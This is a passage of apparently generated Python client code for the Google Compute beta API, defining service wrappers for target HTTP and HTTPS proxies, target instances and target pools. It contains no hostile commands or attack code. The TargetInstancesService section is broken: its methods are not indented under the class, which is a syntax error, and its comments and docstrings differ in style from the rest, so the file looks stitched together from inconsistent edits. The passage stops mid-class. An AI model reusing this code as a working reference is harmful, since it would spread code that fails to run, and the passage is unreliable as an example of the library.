        config, request, global_params=global_params)

  SetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.subnetworks.setIamPolicy',
      ordered_params=[u'project', u'region', u'resource'],
      path_params=[u'project', u'region', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/subnetworks/{resource}/setIamPolicy',
      request_field=u'policy',
      request_type_name=u'ComputeSubnetworksSetIamPolicyRequest',
      response_type_name=u'Policy',
      supports_download=False,
  )

  def SetPrivateIpGoogleAccess(self, request, global_params=None):
    """Set whether VMs in this subnet can access Google services without assigning external IP addresses through Private Google Access.

    Args:
      request: (ComputeSubnetworksSetPrivateIpGoogleAccessRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetPrivateIpGoogleAccess')
    return self._RunMethod(
        config, request, global_params=global_params)

  SetPrivateIpGoogleAccess.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.subnetworks.setPrivateIpGoogleAccess',
      ordered_params=[u'project', u'region', u'subnetwork'],
      path_params=[u'project', u'region', u'subnetwork'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}/setPrivateIpGoogleAccess',
      request_field=u'subnetworksSetPrivateIpGoogleAccessRequest',
      request_type_name=u'ComputeSubnetworksSetPrivateIpGoogleAccessRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeSubnetworksTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.subnetworks.testIamPermissions',
      ordered_params=[u'project', u'region', u'resource'],
      path_params=[u'project', u'region', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/subnetworks/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeSubnetworksTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class TargetHttpProxiesService(base_api.BaseApiService):
  """Service class for the targetHttpProxies resource.

  Generated API client code (apitools): each public method looks up its
  declarative ApiMethodInfo via GetMethodConfig and delegates the actual
  HTTP round-trip to the base class's _RunMethod.
  """

  _NAME = u'targetHttpProxies'

  def __init__(self, client):
    super(ComputeBeta.TargetHttpProxiesService, self).__init__(client)
    # No media-upload configurations for this service.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Deletes the specified TargetHttpProxy resource.

    Args:
      request: (ComputeTargetHttpProxiesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.targetHttpProxies.delete',
      ordered_params=[u'project', u'targetHttpProxy'],
      path_params=[u'project', u'targetHttpProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetHttpProxies/{targetHttpProxy}',
      request_field='',
      request_type_name=u'ComputeTargetHttpProxiesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified TargetHttpProxy resource. Get a list of available target HTTP proxies by making a list() request.

    Args:
      request: (ComputeTargetHttpProxiesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetHttpProxy) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetHttpProxies.get',
      ordered_params=[u'project', u'targetHttpProxy'],
      path_params=[u'project', u'targetHttpProxy'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetHttpProxies/{targetHttpProxy}',
      request_field='',
      request_type_name=u'ComputeTargetHttpProxiesGetRequest',
      response_type_name=u'TargetHttpProxy',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a TargetHttpProxy resource in the specified project using the data included in the request.

    Args:
      request: (ComputeTargetHttpProxiesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpProxies.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetHttpProxies',
      request_field=u'targetHttpProxy',
      request_type_name=u'ComputeTargetHttpProxiesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of TargetHttpProxy resources available to the specified project.

    Args:
      request: (ComputeTargetHttpProxiesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetHttpProxyList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetHttpProxies.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/targetHttpProxies',
      request_field='',
      request_type_name=u'ComputeTargetHttpProxiesListRequest',
      response_type_name=u'TargetHttpProxyList',
      supports_download=False,
  )

  def SetUrlMap(self, request, global_params=None):
    """Changes the URL map for TargetHttpProxy.

    Args:
      request: (ComputeTargetHttpProxiesSetUrlMapRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetUrlMap')
    return self._RunMethod(
        config, request, global_params=global_params)

  # NOTE(review): unlike the other methods of this service, this path has no
  # 'global' segment; this appears to mirror the upstream discovery document
  # for setUrlMap -- confirm against the API reference before changing.
  SetUrlMap.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpProxies.setUrlMap',
      ordered_params=[u'project', u'targetHttpProxy'],
      path_params=[u'project', u'targetHttpProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/targetHttpProxies/{targetHttpProxy}/setUrlMap',
      request_field=u'urlMapReference',
      request_type_name=u'ComputeTargetHttpProxiesSetUrlMapRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeTargetHttpProxiesTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpProxies.testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetHttpProxies/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeTargetHttpProxiesTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class TargetHttpsProxiesService(base_api.BaseApiService):
  """Service class for the targetHttpsProxies resource.

  Generated API client code (apitools): each public method looks up its
  declarative ApiMethodInfo via GetMethodConfig and delegates the actual
  HTTP round-trip to the base class's _RunMethod.
  """

  _NAME = u'targetHttpsProxies'

  def __init__(self, client):
    super(ComputeBeta.TargetHttpsProxiesService, self).__init__(client)
    # No media-upload configurations for this service.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Deletes the specified TargetHttpsProxy resource.

    Args:
      request: (ComputeTargetHttpsProxiesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.targetHttpsProxies.delete',
      ordered_params=[u'project', u'targetHttpsProxy'],
      path_params=[u'project', u'targetHttpsProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}',
      request_field='',
      request_type_name=u'ComputeTargetHttpsProxiesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified TargetHttpsProxy resource. Get a list of available target HTTPS proxies by making a list() request.

    Args:
      request: (ComputeTargetHttpsProxiesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetHttpsProxy) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetHttpsProxies.get',
      ordered_params=[u'project', u'targetHttpsProxy'],
      path_params=[u'project', u'targetHttpsProxy'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}',
      request_field='',
      request_type_name=u'ComputeTargetHttpsProxiesGetRequest',
      response_type_name=u'TargetHttpsProxy',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a TargetHttpsProxy resource in the specified project using the data included in the request.

    Args:
      request: (ComputeTargetHttpsProxiesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpsProxies.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetHttpsProxies',
      request_field=u'targetHttpsProxy',
      request_type_name=u'ComputeTargetHttpsProxiesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of TargetHttpsProxy resources available to the specified project.

    Args:
      request: (ComputeTargetHttpsProxiesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetHttpsProxyList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetHttpsProxies.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/targetHttpsProxies',
      request_field='',
      request_type_name=u'ComputeTargetHttpsProxiesListRequest',
      response_type_name=u'TargetHttpsProxyList',
      supports_download=False,
  )

  def SetQuicOverride(self, request, global_params=None):
    """Sets the QUIC override policy for TargetHttpsProxy.

    Args:
      request: (ComputeTargetHttpsProxiesSetQuicOverrideRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetQuicOverride')
    return self._RunMethod(
        config, request, global_params=global_params)

  SetQuicOverride.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpsProxies.setQuicOverride',
      ordered_params=[u'project', u'targetHttpsProxy'],
      path_params=[u'project', u'targetHttpsProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}/setQuicOverride',
      request_field=u'targetHttpsProxiesSetQuicOverrideRequest',
      request_type_name=u'ComputeTargetHttpsProxiesSetQuicOverrideRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetSslCertificates(self, request, global_params=None):
    """Replaces SslCertificates for TargetHttpsProxy.

    Args:
      request: (ComputeTargetHttpsProxiesSetSslCertificatesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetSslCertificates')
    return self._RunMethod(
        config, request, global_params=global_params)

  # NOTE(review): this path (and SetUrlMap's below) has no 'global' segment,
  # unlike the other methods of this service; this appears to mirror the
  # upstream discovery document -- confirm before changing.
  SetSslCertificates.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpsProxies.setSslCertificates',
      ordered_params=[u'project', u'targetHttpsProxy'],
      path_params=[u'project', u'targetHttpsProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/targetHttpsProxies/{targetHttpsProxy}/setSslCertificates',
      request_field=u'targetHttpsProxiesSetSslCertificatesRequest',
      request_type_name=u'ComputeTargetHttpsProxiesSetSslCertificatesRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetSslPolicy(self, request, global_params=None):
    """Sets the SSL policy for TargetHttpsProxy. The SSL policy specifies the server-side support for SSL features. This affects connections between clients and the HTTPS proxy load balancer. They do not affect the connection between the load balancer and the backends.

    Args:
      request: (ComputeTargetHttpsProxiesSetSslPolicyRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetSslPolicy')
    return self._RunMethod(
        config, request, global_params=global_params)

  SetSslPolicy.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpsProxies.setSslPolicy',
      ordered_params=[u'project', u'targetHttpsProxy'],
      path_params=[u'project', u'targetHttpsProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}/setSslPolicy',
      request_field=u'sslPolicyReference',
      request_type_name=u'ComputeTargetHttpsProxiesSetSslPolicyRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetUrlMap(self, request, global_params=None):
    """Changes the URL map for TargetHttpsProxy.

    Args:
      request: (ComputeTargetHttpsProxiesSetUrlMapRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetUrlMap')
    return self._RunMethod(
        config, request, global_params=global_params)

  SetUrlMap.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpsProxies.setUrlMap',
      ordered_params=[u'project', u'targetHttpsProxy'],
      path_params=[u'project', u'targetHttpsProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/targetHttpsProxies/{targetHttpsProxy}/setUrlMap',
      request_field=u'urlMapReference',
      request_type_name=u'ComputeTargetHttpsProxiesSetUrlMapRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeTargetHttpsProxiesTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpsProxies.testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetHttpsProxies/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeTargetHttpsProxiesTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class TargetInstancesService(base_api.BaseApiService):
"""Service class for the targetInstances resource."""
_NAME = u'targetInstances'
def __init__(self, client):
  """Binds this generated service wrapper to the shared API *client*."""
  super(ComputeBeta.TargetInstancesService, self).__init__(client)
  # No media-upload configurations for this service.
  self._upload_configs = {
      }
def AggregatedList(self, request, global_params=None):
  """Retrieves an aggregated (cross-scope) list of target instances.

  Args:
    request: (ComputeTargetInstancesAggregatedListRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (TargetInstanceAggregatedList) The response message.
  """
  # Look up the declarative RPC description and let the base class run it.
  method_info = self.GetMethodConfig('AggregatedList')
  return self._RunMethod(method_info, request,
                         global_params=global_params)

AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.targetInstances.aggregatedList',
    http_method=u'GET',
    relative_path=u'projects/{project}/aggregated/targetInstances',
    ordered_params=[u'project'],
    path_params=[u'project'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeTargetInstancesAggregatedListRequest',
    response_type_name=u'TargetInstanceAggregatedList',
    supports_download=False,
)
def Delete(self, request, global_params=None):
  """Deletes the given TargetInstance resource.

  Args:
    request: (ComputeTargetInstancesDeleteRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (Operation) The response message.
  """
  # The shared runner issues the HTTP DELETE described by the method config.
  method_info = self.GetMethodConfig('Delete')
  return self._RunMethod(method_info, request,
                         global_params=global_params)

Delete.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.targetInstances.delete',
    http_method=u'DELETE',
    relative_path=u'projects/{project}/zones/{zone}/targetInstances/{targetInstance}',
    ordered_params=[u'project', u'zone', u'targetInstance'],
    path_params=[u'project', u'targetInstance', u'zone'],
    query_params=[u'requestId'],
    request_field='',
    request_type_name=u'ComputeTargetInstancesDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
  """Returns the given TargetInstance resource; use list() to enumerate available target instances.

  Args:
    request: (ComputeTargetInstancesGetRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (TargetInstance) The response message.
  """
  # Resolve this RPC's declarative config, then execute it via the base class.
  method_info = self.GetMethodConfig('Get')
  return self._RunMethod(method_info, request,
                         global_params=global_params)

Get.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.targetInstances.get',
    http_method=u'GET',
    relative_path=u'projects/{project}/zones/{zone}/targetInstances/{targetInstance}',
    ordered_params=[u'project', u'zone', u'targetInstance'],
    path_params=[u'project', u'targetInstance', u'zone'],
    query_params=[],
    request_field='',
    request_type_name=u'ComputeTargetInstancesGetRequest',
    response_type_name=u'TargetInstance',
    supports_download=False,
)
def Insert(self, request, global_params=None):
  """Create a TargetInstance resource in the given project and zone.

  The new resource is built from the data included in the request.

  Args:
    request: (ComputeTargetInstancesInsertRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (Operation) The response message.
  """
  # Look up the wire-level description of this RPC and dispatch it.
  return self._RunMethod(
      self.GetMethodConfig('Insert'), request,
      global_params=global_params)

Insert.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.targetInstances.insert',
    ordered_params=[u'project', u'zone'],
    path_params=[u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/targetInstances',
    request_field=u'targetInstance',
    request_type_name=u'ComputeTargetInstancesInsertRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def List(self, request, global_params=None):
  """Retrieve the TargetInstance resources in the given project and zone.

  Args:
    request: (ComputeTargetInstancesListRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (TargetInstanceList) The response message.
  """
  # Look up the wire-level description of this RPC and dispatch it.
  return self._RunMethod(
      self.GetMethodConfig('List'), request,
      global_params=global_params)

List.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.targetInstances.list',
    ordered_params=[u'project', u'zone'],
    path_params=[u'project', u'zone'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    relative_path=u'projects/{project}/zones/{zone}/targetInstances',
    request_field='',
    request_type_name=u'ComputeTargetInstancesListRequest',
    response_type_name=u'TargetInstanceList',
    supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
  """Return the permissions the caller holds on the given resource.

  Args:
    request: (ComputeTargetInstancesTestIamPermissionsRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (TestPermissionsResponse) The response message.
  """
  # Look up the wire-level description of this RPC and dispatch it.
  return self._RunMethod(
      self.GetMethodConfig('TestIamPermissions'), request,
      global_params=global_params)

TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.targetInstances.testIamPermissions',
    ordered_params=[u'project', u'zone', u'resource'],
    path_params=[u'project', u'resource', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/targetInstances/{resource}/testIamPermissions',
    request_field=u'testPermissionsRequest',
    request_type_name=u'ComputeTargetInstancesTestIamPermissionsRequest',
    response_type_name=u'TestPermissionsResponse',
    supports_download=False,
)
class TargetPoolsService(base_api.BaseApiService):
  """Service class exposing the targetPools resource.

  Each public method dispatches one RPC; the matching ``method_config``
  lambda supplies the wire-level metadata (HTTP verb, URL template,
  parameter placement, and message types) consumed by the base service.
  """

  _NAME = u'targetPools'

  def __init__(self, client):
    """Initialize the service; this resource defines no upload configs."""
    super(ComputeBeta.TargetPoolsService, self).__init__(client)
    self._upload_configs = {}

  def AddHealthCheck(self, request, global_params=None):
    """Add health check URLs to a target pool.

    Args:
      request: (ComputeTargetPoolsAddHealthCheckRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('AddHealthCheck'), request,
        global_params=global_params)

  AddHealthCheck.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.addHealthCheck',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/addHealthCheck',
      request_field=u'targetPoolsAddHealthCheckRequest',
      request_type_name=u'ComputeTargetPoolsAddHealthCheckRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def AddInstance(self, request, global_params=None):
    """Add an instance to a target pool.

    Args:
      request: (ComputeTargetPoolsAddInstanceRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('AddInstance'), request,
        global_params=global_params)

  AddInstance.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.addInstance',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/addInstance',
      request_field=u'targetPoolsAddInstanceRequest',
      request_type_name=u'ComputeTargetPoolsAddInstanceRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def AggregatedList(self, request, global_params=None):
    """Retrieve an aggregated list of target pools.

    Args:
      request: (ComputeTargetPoolsAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetPoolAggregatedList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('AggregatedList'), request,
        global_params=global_params)

  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetPools.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/targetPools',
      request_field='',
      request_type_name=u'ComputeTargetPoolsAggregatedListRequest',
      response_type_name=u'TargetPoolAggregatedList',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Delete the specified target pool.

    Args:
      request: (ComputeTargetPoolsDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request,
        global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.targetPools.delete',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}',
      request_field='',
      request_type_name=u'ComputeTargetPoolsDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Return the specified target pool.

    A list of available target pools can be obtained with a list() request.

    Args:
      request: (ComputeTargetPoolsGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetPool) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetPools.get',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}',
      request_field='',
      request_type_name=u'ComputeTargetPoolsGetRequest',
      response_type_name=u'TargetPool',
      supports_download=False,
  )

  def GetHealth(self, request, global_params=None):
    """Get the most recent health check results for each IP of the instance.

    The instance is the one referenced by the given target pool.

    Args:
      request: (ComputeTargetPoolsGetHealthRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetPoolInstanceHealth) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('GetHealth'), request,
        global_params=global_params)

  GetHealth.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.getHealth',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/getHealth',
      request_field=u'instanceReference',
      request_type_name=u'ComputeTargetPoolsGetHealthRequest',
      response_type_name=u'TargetPoolInstanceHealth',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Create a target pool in the given project and region.

    The new resource is built from the data included in the request.

    Args:
      request: (ComputeTargetPoolsInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Insert'), request,
        global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.insert',
      ordered_params=[u'project', u'region'],
      path_params=[u'project', u'region'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/targetPools',
      request_field=u'targetPool',
      request_type_name=u'ComputeTargetPoolsInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieve the target pools available in the given project and region.

    Args:
      request: (ComputeTargetPoolsListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetPoolList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('List'), request,
        global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetPools.list',
      ordered_params=[u'project', u'region'],
      path_params=[u'project', u'region'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/regions/{region}/targetPools',
      request_field='',
      request_type_name=u'ComputeTargetPoolsListRequest',
      response_type_name=u'TargetPoolList',
      supports_download=False,
  )

  def RemoveHealthCheck(self, request, global_params=None):
    """Remove a health check URL from a target pool.

    Args:
      request: (ComputeTargetPoolsRemoveHealthCheckRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('RemoveHealthCheck'), request,
        global_params=global_params)

  RemoveHealthCheck.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.removeHealthCheck',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/removeHealthCheck',
      request_field=u'targetPoolsRemoveHealthCheckRequest',
      request_type_name=u'ComputeTargetPoolsRemoveHealthCheckRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def RemoveInstance(self, request, global_params=None):
    """Remove an instance URL from a target pool.

    Args:
      request: (ComputeTargetPoolsRemoveInstanceRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('RemoveInstance'), request,
        global_params=global_params)

  RemoveInstance.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.removeInstance',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/removeInstance',
      request_field=u'targetPoolsRemoveInstanceRequest',
      request_type_name=u'ComputeTargetPoolsRemoveInstanceRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetBackup(self, request, global_params=None):
    """Change a backup target pool's configurations.

    Args:
      request: (ComputeTargetPoolsSetBackupRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('SetBackup'), request,
        global_params=global_params)

